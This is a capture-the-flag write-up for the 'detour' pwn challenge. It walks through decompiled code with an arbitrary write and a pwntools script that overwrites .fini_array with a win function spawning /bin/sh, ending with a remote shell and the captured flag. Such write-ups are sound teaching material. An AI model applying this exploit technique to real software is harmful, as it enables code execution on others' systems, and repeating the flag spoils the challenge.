Tags: write-what-where pwn fini_array
Rating:
write-what-where as a service! Now how do I detour away from the intended path of execution?
Author: @M_alpha#3534
Tags: pwn x86-64 write-what-where
One-shot write-what-where to overwrite .fini_array with win function.
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
No RELRO--every time it's .fini_array.
Just overwrite .fini_array with a win function if it exists (or grow your own).
undefined8 main(void)
{
long in_FS_OFFSET;
undefined8 local_20;
long local_18;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
printf("What: ");
__isoc99_scanf(&DAT_00402013,&local_20);
getchar();
printf("Where: ");
__isoc99_scanf(&DAT_0040201f,&local_18);
getchar();
*(undefined8 *)((long)&base + local_18) = local_20;
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
__stack_chk_fail();
}
return 0;
}
*(undefined8 *)((long)&base + local_18) = local_20; is a write-what-where.
void win(void)
{
system("/bin/sh");
return;
}
And there's the win function.
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./detour', checksec=False)
if args.REMOTE:
p = remote('challenge.nahamcon.com', 32549)
else:
p = process(binary.path)
p.sendlineafter(b'What: ', str(binary.sym.win).encode())
p.sendlineafter(b'Where: ',str(binary.get_section_by_name('.fini_array').header.sh_addr - binary.sym.base).encode())
p.interactive()
Overwrite .fini_array with the location of the function win.
Where needs to be less
base, sincebaseis added towherein*(undefined8 *)((long)&base + local_18) = local_20;
Output:
# ./exploit.py REMOTE=1
[+] Opening connection to challenge.nahamcon.com on port 32549: Done
[*] Switching to interactive mode
$ cat flag.txt
flag{787325292ef650fa69541722bb57bed9}
